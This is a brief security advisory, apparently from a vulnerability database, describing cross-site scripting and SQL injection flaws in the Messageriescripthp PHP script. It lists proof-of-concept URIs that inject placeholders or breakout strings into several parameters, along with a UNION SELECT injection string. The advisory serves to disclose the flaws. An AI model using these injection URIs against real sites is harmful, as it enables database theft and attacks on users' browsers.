|
Messageriescripthp Multiple Input Validation Vulnerabilities
To exploit the cross-site scritping issue: An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI. The following proof-of-concept URIs are available: http://www.example.com//[script_messagerie_path]/existepseudo.php?pseudo=[XSS] http://www.example.com/[script_messagerie_path]/existeemail.php?email=[XSS] http://www.example.com/[script_messagerie_path]/Contact/contact.php?pageName=</title>[XSS] http://www.example.com/[script_messagerie_path]/Contact/contact.php?cssform=">[XSS]<foo To exploit aSQL-injection issue: An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available: http://www.example.com/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION] http://www,example.com/[script_messagerie_path]/membre/fiche_tousmembres.php?recordID=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc...# |
|
Privacy Statement |